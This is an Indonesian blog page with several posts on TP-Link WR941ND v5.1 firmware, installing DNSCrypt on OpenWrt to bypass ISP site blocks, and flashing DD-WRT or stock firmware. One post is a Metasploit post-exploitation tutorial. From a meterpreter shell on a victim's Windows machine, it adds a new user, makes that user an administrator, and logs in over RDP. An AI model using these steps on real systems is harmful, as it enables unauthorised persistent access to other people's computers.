Friday, February 2, 2018

Sisi Negatif Kekurangan Keluarga WR941ND v5.x

  No comments
12:55:00 PM

Oke, kali ini saya akan sedikit curhat tentang mainan saya yang beberapa waktu lalu sempat saya posting, yaitu TP-Link WR941ND versi 5.1. Saya akan membeberkan beberapa kekurangan dari router tersebut. Langsung saja kita simak!



Ada beberapa keambiguan dalam router ini beberapa diantara nya adalah :


1. Versi FCC ID
Ada beberapa sub-versi dalam satu versi ini (lebih tepatnya adalah versi 5), yaitu ada versi lain dalam versi ini, seperti : v5.1, v5.2, v5.3, dan lain sebagainya. Saya akan mereview sedikit tentang versi 5.1 yang saya gunakan. Yang sedikit membingungkan adalah ada isu mengenai perbedaan hardware pada versi 5 yang ditandai dengan perbedaan FCC ID. Seperti pada yang dicantumkan pada situs DD-WRT (http://svn.dd-wrt.com/ticket/3003) disitu dinyatakan ada FCC ID yang berbeda, yaitu TE7WR941NXV4 dan TE7WR941NXV5, dimana keduanya mempunyai firmware yang sedikit berbeda, jika salah maka akan membuat router kalian brick. Namun hal ini sudah tidak lagi menjadi kendala, karena dengan sedikit kulik-kulik saya dapat mengatasinya dengan cara merubah header pada file binary firmware yang ada.



2. Antenna
Pada WR941NDv5.1 dengan FCC ID TE7WR941NXV5 yang saya gunakan, berdasarkan pada situs wiki yang ada (WikideviDarkhavenWiki OpenWrtketerangan antenna MIMO nya adalah 2x2:2 dimana artinya hanya ada 2x TX, dan 2x RX, untuk 2x kecepatan wireless N (2x150Mbps = 300Mbps). Secara sederhana nya, meskipun router tersebut hadir dengan 3 buah antenna, namun sebenarnya hanya ada 2 antenna saja yang berfungsi penuh untuk keperuan TX dan RX. Pada original firmware TP-Link memang tidak terlalu terlihat signifikan, namun saat kalian mencoba dengan custom firmware seperti OpenWrt atau DD-WRT, maka akan terlihat jelas bahwa ada salah satu antenna yang tidak berfungsi sama sekali (hanya 2 antenna yang digunakan). Dan usut punya usut, setelah saya coba satu persatu, hasil nya adalah : a). Saat menggunakan OpenWrt antenna tengah tidak berfungsi. b). Saat menggunakan DD-WRT antenna disisi paling kanan tidak berfungsi. c). Saat menggunakan firmware original TP-Link semua antenna berfungsi. Pertanyaannya, "kenapa demikian?" hal tersebut dikarenakan pada custom firmware WR941NDv5.x ini dibuat berdasarkan custom firmware WR841N/NDv8.x yang hanya mempunyai 2 antenna inti.



Oke segitu saja pengalaman buruk yang saya temui pada keluarga WR941NDv5.x mungkin pada poin 2 diatas, merupakan alasan kenapa versi 5 menggunakan adaptor power dengan kekuatan 9V 0.6A saja, tidak seperti versi sebelumnya yang minimal adalah 9V 0.85A.


Sekian curhat saya kali ini, semoga bermanfaat!

Read More

Tuesday, January 30, 2018

Mendapatkan Akses RDP Admin melalui Metasploit

  No comments
7:55:00 PM

Baik kali ini saya ingin berbagi tips untuk kalian yang sudah mendapatkan sesi meterpreter pada metasploit lalu ingin mendapatkan akses RDP Windows dengan hak akses Full Admin. Penasaran? Langsung saja kita simak!



Instruksi

1. Kalian harus sudah mendapatkan sesi meterpreter. Untuk cara mendapatkan sesi meterpreter saya tidak akan bahas pada post kali ini kalian bisa mencari tahu disini.

Sesi meterpreter


Disini saya sudah mendapatkan sesi meterpreter dari target saya, yaitu sebuah komputer dengan OS Windows XP.


2. Buka akses shell pada meterpreter untuk masuk kedalam command prompt target kita

meterpreter > shell


3. Pada command prompt yang terbuka, jalankan perintah dibawah ini untuk membuat user baru pada komputer korban

C:\WINXP\system32> net user tyo tyoganteng /add

- Perintah net user adalah untuk melakukan manajemen user pada Windows.
- String tyo adalah username dari user baru yang akan kita buat.
- String tyoganteng adalah password dari user tyo yang akan kita buat.
- Parameter /add digunakan untuk melakukan penambahan user.


4. Jadikan user tyo tersebut mempunyai hak akses Administrator dengan menjalankan perintah berikut

C:\WINXP\system32> net localgroup administrators tyo /add

- Perintah net localgroup adalah untuk melakukan manajemen hak akses usergroup pada Windows.
- String administrators adalah untuk merubah hak akses user tyo menjadi Administrator.
- String tyo adalah username dari user yang akan kita ubah hak akses nya menjadi Administrator.
- Parameter /add digunakan untuk melakukan penambahan perubahan hak akses.

Bila kalian sukses menjalankan langkah nomor 2 sampai nomor 4, maka kurang lebih akan seperti gambar dibawah

Langkah 2 sampai langkah 4


5. Kalian sudah selesai membuat user baru dengan hak akses Full Administrator. Selanjutnya adalah mencoba untuk login melalui RDP dengan menggunakan rdesktop atau remmina

root@fuckware:~# rdesktop -u tyo -p tyoganteng 192.168.1.100

- Parameter -u tyo adalah untuk login menggunakan user tyo.
- Parameter -p tyoganteng adalah untuk login dengan password tyoganteng.
- Parameter 192.168.1.100 adalah alamat IP dari komputer korban.


Supaya lebih jelas kalian bisa melihat video dibawah ini



Oke sekian post saya kali ini tentang Mendapatkan Akses RDP Admin melalui Metasploit, semoga bermanfaat.
Terimakasih!

Read More

Saturday, January 20, 2018

Cara Mudah Install DNSCrypt di OpenWrt

  No comments
2:37:00 PM

Ingin membuka situs yang terblokir? Jalankan DNSCrypt di router kamu! Kali Ini saya ingin membahas tentang DNSCrypt, apa itu DNSCrypt? apa kegunaan DNSCrypt? Mari kita simak lebih lanjut!

DNSCrypt-Proxy

Ketika sedang browsing di internet, ingin download file, atau membuka alamat website tertentu seperti kumpulbagi, reddit, kita seringkali terhambat karena situs tersebut diblokir oleh ISP. Lalu direpotkan juga untuk terlebih dahulu mengaktifkan VPN, dan barulah bisa mengunjungi situs - situs yang terblock oleh ISP. Sayangnya, VPN dengan server yang jauh dari tempat tinggal kita seringkali justru membuat koneksi internet kita bertambah lamban, dan itu sangat memuakkan bukan? Mau mengganti konfigurasi DNS menjadi DNS milik Google? Ah itu sudah tidak manjur lagi sobat, ISP kita sudah canggih dengan memakai DNS Transparent yang mau tidak mau kita tetap tidak bisa mengakses semua situs sesuka hati kita.

Konsep DNSCrypt


Disinilah DNSCrypt hadir sebagai penyelamat bagi kita, hehe. DNSCrypt adalah solusi bagi kita yang tidak mau speed turun karena menggunakan VPN hanya untuk mengakses beberapa situs tertentu saja yang terblokir. Layaknya protokol SSL yang merubah HTTP menjadi HTTP(S), sederhana nya DNSCrypt akan membuat DNS kita menjadi DNS yang ter-enkripsi. Sehingga setiap request DNS kita akan diamankan dan tidak bisa dimanipulasi. Dan jika DNSCrypt diimplementasikan pada router, maka hasilnya adalah kita bisa membuka situs apapun di Internet yang sebelumnya diblokir oleh ISP tanpa repot merubah DNS manual ataupun menggunakan VPN yang lamban.



Instruksi


*Pada post ini, router menggunakan firmware OpenWrt Chaos Calmer 15.05.1


Install DNSCrypt

Pada sesi SSH OpenWrt, jalankan perintah dibawah ini

opkg update
opkg install dnscrypt-proxy



Konfigurasi supaya DNSCrypt berjalan otomatis

Untuk mencegah berhentinya DNSCrypt karena router mati atau reboot, kita harus mengedit file /etc/rc.local menggunakan editor favorit kalian seperti nano atau vi

nano /etc/rc.local

di dalam file tersebut, tambahkan baris konfigurasi dibawah ini sebelum baris bertuliskan exit 0

sleep 10
/etc/init.d/dnscrypt-proxy start
Lalu tutup dan simpan file konfigurasi tersebut.



Konfigurasi Dnsmasq pada OpenWrt

Edit file /etc/config/dhcp menggunakan nano atau vi

nano /etc/config/dhcp
    lalu rubah konfigurasi bagian config Dnsmaq menjadi seperti berikut

    config Dnsmasq
        option domainneeded         '1'
        option boguspriv            '1'
        option filterwin2k          '0'
        option localise_queries     '1'
        option rebind_protection    '1'
        option rebind_localhost     '1'
        option local                '/lan/'
        option domain               'lan'
        option expandhosts          '1'
        option nonegcache           '0'
        option authoritative        '1'
        option readethers           '1'
        option leasefile            '/tmp/dhcp.leases'
    #   option resolvfile           '/tmp/resolv.conf.auto'
        option noresolv             '1'
        list server                 '127.0.0.1#5353'
        list server                 '/pool.ntp.org/208.67.222.222'
    #   list server                 '208.67.222.222'
    #   list server                 '208.67.220.220'
    

    • Penggunaan # (Hashtag) pada baris konfigurasi option resolvfile adalah untuk mencegah router menggunakan DNS dari ISP
    • Baris konfigurasi option noresolv juga dikonfigurasi dengan memasukan angka '1' supaya router tidak menggunakan DNS dari ISP
    • Baris konfigurasi list server '127.0.0.1#5353' dimaksudkan supaya Dnsmasq nantinya memakai DNSCrypt untuk resolver
    • Penambahan baris konfigurasi list server '/pool.ntp.org/208.67.222.222'  adalah sebagai pengecualian bagi NTP supaya tidak melewati DNSCrypt
    Jika sudah, tutup dan simpan file konfigurasi tersebut.



    Restart Layanan Dnsmasq

    Tahap terakhir yang perlu dilakukan adalah reboot router kita atau cukup restart layanan Dnsmasq dengan menjalankan perintah berikut

    /etc/init.d/dnsmasq restart



    Selesai

    Yang perlu dilakukan pada sisi client hanyalah reconnect koneksi WiFi atau kabel Ethernet, lalu bersihkan cache web browser kalian. Setelahnya, lakukan pengujian untuk membuka situs yang terblokir oleh ISP, misalnya https://reddit.com/



    Untuk lebih jelasnya, silahkan lihat video berikut :





    Oke sekian post saya kali ini tentang Cara Mudah Install DNSCrypt di OpenWrt, dengan ini sekarang semua client yang terkoneksi dengan router bisa membuka semua situs yang terblokir oleh ISP.
    Semoga bermanfaat!

    Read More

    Flash dari OpenWrt/DD-WRT ke Stock Firmware WR941ND v5.1

      No comments
    1:34:00 PM

    Kali ini saya ingin membuat post tentang cara Flash dari OpenWrt/DD-WRT ke Stock Firmware WR941ND v5.1, khusus untuk kalian yang sekarang sedang dalam posisi menggunakan firmware OpenWrt atau DD-WRT dan belum tahu bagaimana cara mengembalikan firmware stock (original) TP-Link WR941ND v5.1. Langsung saja kita simak!

    WR941ND v5.1



    Download

    WR940ND v5.1 Stripped Stock Firmware


    Instruksi

    1. Download file firmware diatas lalu rename menjadi fw.bin
    2. Hubungkan komputer kalian dengan router
    3. Upload firmware fw.bin ke direktori /tmp/ pada router menggunakan WinSCP
    4. Login SSH router menggunakan PuTTY

    - Untuk OpenWrt, ketik :

    root@OpenWrt:~$ cd /tmp/ && mtd -r write fw.bin linux

    - Untuk DD-WRT, ketik :


    root@DD-WRT
    :~$ cd /tmp/ && mtd -r write fw.bin firmware




    Untuk lebih jelasnya kalian bisa melihat video berikut :

    - OpenWrt


    - DD-WRT


    Oke sekian post saya kali ini tentang cara Flash dari OpenWrt/DD-WRT ke Stock Firmware WR941ND v5.1
    Semoga bermanfaat!

    Read More

    Flash DD-WRT di WR941ND v5.1

      No comments
    1:09:00 PM

    Sekarang saya akan membuat post tentang bagaimana cara supaya router WR941ND v5.1 bisa menggunakan firmware DD-WRT. Langsung saja kita simak yuk!

    WR941ND v1.5


    Download



    Instruksi

    1. Koneksikan komputer dengan router, usahakan memakai kabel LAN.
    2. Buka WebUI TP-Link WR941ND melalui web browser, biasanya beralamat sesuai IP router (misal : http://192.168.0.1/)
    3. Pilih menu System Tools > Firmware Upgrade lalu pilih file firmware yang telah kalian download dari link diatas, dan klik Upgrade
    4. Tunggu sampai selesai, lalu coba buka WebUI milik DD-WRT dari http://192.168.1.1/ 

    Supaya lebih jelas, kalian lihat video dibawah ini :



    Preview

    DD-WRT WR941ND v5.1


    Oke sekian post saya kali ini tentang cara Flash DD-WRT di WR941ND v5.1
    Semoga bermanfaat!

    Read More